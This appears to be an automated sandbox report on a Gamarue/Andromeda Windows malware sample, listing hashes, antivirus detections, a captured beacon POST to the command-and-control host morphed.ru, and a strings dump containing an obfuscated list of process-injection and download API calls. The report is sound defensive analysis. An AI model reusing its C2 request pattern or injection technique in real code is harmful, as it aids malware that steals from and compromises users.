Analysis Date2016-11-14 18:01:12
MD5157dda2b890fd2f08e4c2742eac91248
SHA121b683a4fb6cbf8191098ecb07581b174fda24ff

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: a3e1ce6e0f137852446165856a8e7045 sha1: 065709db243457d504a0cd1baf1253d54b9da3df size: 19456
Section.data md5: f859f3e20b63fac333f0da1cfcaef96c sha1: 4e7e9f1e381b3d29223c6d529543120d9bb27a6f size: 2048
Section.xcpad md5: sha1: size:
Section.idata md5: sha1: size:
Section.reloc md5: sha1: size:
Section.rsrc md5: c56c8b813e9c244f0064febc3beb8e08 sha1: 8d896befe537b098749031dc876acd959d995435 size: 67072
Timestamp
VersionLegalCopyright:
PackagerVersion:
InternalName:
FileVersion:
CompanyName:
Comments:
ProductName:
ProductVersion:
FileDescription:
Packager:
OriginalFilename:
PackerInstaller VISE Custom
PEhash
IMPhashde1d6cbe23c278509e0a7f5966a20354
AV360 SafeWorm.Win32.Gamarue.V
AVAd-AwareGen:Variant.Symmi.22996
AVAlwil (avast)?
AVArcabit (arcavir)Gen:Variant.Symmi.22996
AVAuthentiumW32/A-49bf794c!Eldorado
AVAvira (antivir)TR/Rogue.22761
AVBitDefenderGen:Variant.Symmi.22996
AVBullGuardGen:Variant.Symmi.22996
AVCA (E-Trust Ino)Gen:Variant.Symmi.22996
AVCAT (quickheal)Worm.Gamarue.B
AVClamAVWin.Trojan.Downloader-61798
AVDr. WebBackDoor.Andromeda.178
AVEmsisoftGen:Variant.Symmi.22996
AVEset (nod32)Win32/Injector.AIOX
AVF-SecureTrojan-Downloader:W32/Wauchos.F
AVFortinetW32/Kryptik.BBYD!tr
AVFrisk (f-prot)No Virus
AVGrisoft (avg)Dropper.Generic8.BBQY
AVIkarusTrojan-Downloader.Win32.Andromeda
AVK7Trojan ( 0043b77a1 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesTrojan.Agent
AVMcafeeDownloader-FOS!157DDA2B890F
AVMicroWorld (escan)Gen:Variant.Symmi.22996
AVMicrosoft Security EssentialsWorm:Win32/Gamarue.AJ
AVRisingTrojan.Win32.Read.a
AVSUPERAntiSpywareTrojan.Agent/Gen-Dofoil
AVSymantecDownloader.Dromedan
AVTrend MicroWORM_GAMARUE.SMJ
AVTwisterTrojan.D875EDBFBC8E8805
AVVirusBlokAda (vba32)SScope.Worm.Gamarue.2713
AVWindows DefenderWorm:Win32/Gamarue.AJ
AVZillya!Downloader.Andromeda.Win32.3263

Runtime Details:

Screenshot

Process
↳ C:\21b683a4fb6cbf8191098ecb07581b174fda24ff.exe

Creates FileC:\WINDOWS\WindowsShell.Manifest

Network Details:


Raw Pcap
0x00000000 (00000)   504f5354 202f7374 61746963 2e706870   POST /static.php
0x00000010 (00016)   20485454 502f312e 310d0a48 6f73743a    HTTP/1.1..Host:
0x00000020 (00032)   206d6f72 70686564 2e72750d 0a557365    morphed.ru..Use
0x00000030 (00048)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000040 (00064)   2f342e30 0d0a436f 6e74656e 742d5479   /4.0..Content-Ty
0x00000050 (00080)   70653a20 6170706c 69636174 696f6e2f   pe: application/
0x00000060 (00096)   782d7777 772d666f 726d2d75 726c656e   x-www-form-urlen
0x00000070 (00112)   636f6465 640d0a43 6f6e7465 6e742d4c   coded..Content-L
0x00000080 (00128)   656e6774 683a2038 340d0a43 6f6e6e65   ength: 84..Conne
0x00000090 (00144)   6374696f 6e3a2063 6c6f7365 0d0a0d0a   ction: close....
0x000000a0 (00160)   75707163 68537737 76464841 4575646e   upqchSw7vFHAEudn
0x000000b0 (00176)   6d594b47 4977694c 7258387a 554e3638   mYKGIwiLrX8zUN68
0x000000c0 (00192)   54337971 76685175 32547165 74516e33   T3yqvhQu2TqetQn3
0x000000d0 (00208)   71497937 51366270 54664455 74594966   qIy7Q6bpTfDUtYIf
0x000000e0 (00224)   745a3333 4e427342 4c677367 396d5933   tZ33NBsBLgsg9mY3
0x000000f0 (00240)   71773d3d                              qw==


Strings
h(s@
h4p@
h(s@
j*j;
j/jb
jcj!j
jUjO
j!jc
QjNj
jFj(
}vj*h
j	jA
jAj>j$
tYj8jbj
jHja
jhj!
j	jE
tZj0j\jM
j!j%
j-jW
jcj
j%j(
j4j*
j\j3j
QWj[j
jEjw
=0p@
j9jdj
j1jRjE
h`"@
XSVW
Yt4^
YYh p@
<"u%
F<"t
t9UW
?=t"U
QQS3
PSSW
8"uD
8"uF@
8"u,
-D`@
@@f9
@@f9
=<`@
SS@SSPVSS
t#SSUP
t$$VSS
_^][YY
DSUVWh
_^][
8MZu
t>j,P
Yt0@
SVWUj
]_^[
t.;t$$t(
VC20XC00U
SVWU
tEVU
t3x<
]_^[
=4s@
A=pt@
=4s@
hhc@
5d`@
uiSj
uY;]
pD#U
j #M
j?^;
SUVWu
-t`@
=pt@
=tt@
5tt@
_^][
5tt@
Y;5tt@
QQSV
sN;E
u%C@
Y;5t
90tr
Wj@Y3
t7SW

@AA;
Vt6P
<Xt
u,9E
^_[3
^[_3
VWuBh
tzVS
GIt%
t/Ku
uFWWj
"WWSh
9} u
E WW
tMWWS
t@9}
VSh
h(d@
%l`@
__GLOBAL_HEAP_SELECTED
__MSVCRT_HEAP_SELECT
runtime error
TLOSS error
SING error
DOMAIN error
R6028
- unable to initialize heap
R6027
- not enough space for lowio initialization
R6026
- not enough space for stdio initialization
R6025
- pure virtual function call
R6024
- not enough space for _onexit/atexit table
R6019
- unable to open console device
R6018
- unexpected heap error
R6017
- unexpected multithread lock error
R6016
- not enough space for thread data
abnormal program termination
R6009
- not enough space for environment
R6008
- not enough space for arguments
R6002
- floating point not loaded
Microsoft Visual C++ Runtime Library
Runtime Error!
Program:
<program name unknown>
GetLastActivePopup
GetActiveWindow
MessageBoxA
user32.dll
LoadLibraryA
GetProcAddress
GetTickCount
GetModuleFileNameA
KERNEL32.dll
GetModuleHandleA
GetStartupInfoA
GetCommandLineA
GetVersion
ExitProcess
HeapAlloc
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
FreeEnvironmentStringsA
FreeEnvironmentStringsW
WideCharToMultiByte
GetEnvironmentStrings
GetEnvironmentStringsW
SetHandleCount
GetStdHandle
GetFileType
GetEnvironmentVariableA
GetVersionExA
HeapDestroy
HeapCreate
VirtualFree
HeapFree
RtlUnwind
WriteFile
VirtualAlloc
HeapReAlloc
GetCPInfo
GetACP
GetOEMCP
MultiByteToWideChar
LCMapStringA
LCMapStringW
GetStringTypeA
GetStringTypeW
}Svo}Gbtu}MpbeMjcsbszB}ouemm/emm}xjojofu/emm}pmf43/emm}tifmm43/emm}HfuNpevmfIboemfB}XsjufQspdfttNfnpsz}DsfbufQspdfttX}TfuUisfbeDpoufyu}HfuUisfbeDpoufyu}SftvnfUisfbe}GjoeSftpvsdfB}MpbeSftpvsdf}Tj{fpgSftpvsdf}WjsuvbmBmmpdFy}OuVonbqWjfxPgTfdujpo}DpoujovfEfcvhFwfou}XbjuGpsEfcvhFwfou}SfbeQspdfttNfnpsz}DsfbufUppmifmq43Tobqtipu}Npevmf43Gjstu}PvuqvuEfcvhTusjohB}DmptfIboemf}FyjuQspdftt}HfuDvssfouQspdftt}DsfbufUisfbe}XbjuGpsTjohmfPckfdu}TfuGjmfBuusjcvuftX}JoufsofuPqfoB}JoufsofuPqfoVsmB}JoufsofuSfbeGjmf}EfmfufVsmDbdifFousz}JoufsofuDmptfIboemf}HmpcbmGsff}HmpcbmBmmpd}TfuVoiboemfeFydfqujpoGjmufs}NvmujCzufUpXjefDibs}TIHfuTqfdjbmGpmefsQbuiX}DpJojujbmj{f}DpDsfbufJotubodf}mtusdqzX}mtusdbuX}HfuNpevmfGjmfObnfX
Read
kernel32.dll
GetProcAddress
5>Cv
Vku=JPM_l
!<Vd
*?<Wol
DawWv
BUjq
+vbSp
eW@
T6j=I
hw1^s
[OY4
(QPg
p&h*
&D#rpp
vV@J
T<'^
O&V9
)D5K
#1G&
	?02<
md,bR
a)s(xy
SoHe
jLfXg
&xk'
v;vfUb
rAg/V%
al.-
{i\X
+-~zz
,`s{
^#Z;
#vzv
KD@Y-
\]7M\
o#k6@
YJ7O
SbE<
(lwtc
6B1i
[)b>
VNE#v
sr$(p8
j$c|H(#2
Z1}?
a9R[
z\ q8}
6|*n
&-i=;
FC;U
B4XY
K-Yu
~YlT
|iTB^
wL}#
_'i.
 7TY
3X+_
3%O<
P{[>w
	FY:Y
[>sf
3=QW^
9Cckx
*Nrkj
d(Z?
=?5b=<
PAgJR
W@H7
Z`P_
X1yy
r(\2
Lz?Vh
\}H+
 8MQ
:{U3
PVo?
QE}|
}	Z:1
|9Wn
^Hl8
U8yP
xVL4a+
uze"
mf"j
:uF&a
k:L7`s
,53@
"[,B
<4q]
V_g4
2F#L
rz6l
@P$N
+ESf
&`w!
 9'Ty
^' @L
qx!vp
geuje
!v[r0j
}]B$Q
9T*$N
	;R<}
JXT!n
5l"?
)!Hr
4-TU_K
=zIT
#V\B
By B
	;tV
6y8A
TxzmK
8zhxD
.4?G
i_(;
D:TTl
hxhS
;Iw9
bu+2
z01t)
9lNL
uc;H1}
8qCc+`x
B/4:
"MBA
DZBZ@u
H]Vw
PBe^
(=yg]
^=5Dm
MkR:
D=bn%
Pj)y
@V:g
&,4b
e&%q
R/FV
'N3s
.-Rf
bCU,
#n)|O
P)HD
)M'B6
D<k;
YA<{
Y';+
C%+b
qigV
$KIkbO'
%>'Q4
8qXa
\%2_}
uO%S
-|d4
L']v#
-#9?
"thZ
'`n3
!5Fa
&9mC)!@
};EQ9
k@f;l
YY'O3e'
#&JF
t,-M
&buys
-: y
,I/^`
ojs}
|5*)
r^js
vd*D
!}%'Y
r:Y6
$@)v
LyH.
Q0P%k
|z!5
i :TE
mtjmyu
c_92Nn
'P6d
g?iz
s:d!
p?o^
Af.z4|
>_W}m5z<
slTp~
	L	6
OR".
<Y"{
[>.Um&
	YSw
Z=F)q8/
B^G8){kcn
<M<J
2%@,
oEYW
80l(
%G'8
}9Y6-`1
"U|3
foed
bXsN
/=>l_;
p?h6
[C%g$
LK#:
N8z|B
7#@V
-r	$
6Es{
JhWX2
oIL3
c7{G
)*-H
jRU4p
*U3O
UEQS
#j3?
qA>j
.\Fut
(0C@
URT?
Y06u"D
Iro(
X2c4B\
WA)LA+
	WWy~
o#.$
/RmG
s8X&
,-TN
xqdI$O
S.Ro
!tLk
L6NmA
Wm:)"
dIQ<
H(S&z
7p%j
6rCQ
SCmQ
%2Hr
TRRDyY
EO>H,9
gHdF
u(@;
A5V&
Qu\t*#=N
XOF9
'&/clm
7u6E
bd(nEH
XQqF
51QB=+y
XArf
8H=$
'/P-
20aPp
fmS.)
-9^hA
@3*T
pwD_B3/
e!jJ{
"J	G
1X#n
)N*sZ
h~X8""
QPsZ
H5N4b
c{;+
)`*4
Xl&D
uqDe
S1 YM
,anz
p~QZ
#8_/
A-M]
H7NH
hflO
:]:U
<ocG
}<1I
5|X*
*[Jk$
j-vs
vgZQ
fWdk
*Th65G
S@K;
ALy=+
(e'q
i@QCC
Rl!*<gI
H_6%
zEYg
5n_afi
g*%&?c
P6}H
OiV~p
l`Co
j+ 6
(t)I
~Goj
0Gi{
l[(PX
8/'r
xT1M
]?L~g
>mi`U
qAb?
r\A=
n|S"
&M`)
CB[l
H.}mrD
}A]O!
9$cz>,
mgmH
`KSPSV
xXV_
S`I"u
zn#S(o	W
I8hD
=Zo-_Uc
q{zo
Drd6
jGaE
7hCa
H72
(Y[~4
y~hw
A,,i
w4gi
j{)=
Em[#
aV^1
	C~!G
;v[t
kKU&F
|e)
}xF2
bwQ@
!z{2?
w	,[
"qK)1
[0QX
5<%!40
po|2
_X=u
hA~v
sJOy
AY_e1
pwY
Sq"i
4;u08
fT^Q
0Q-B~
<VGX5
R%l#
o/i`
h)C:U
#)t7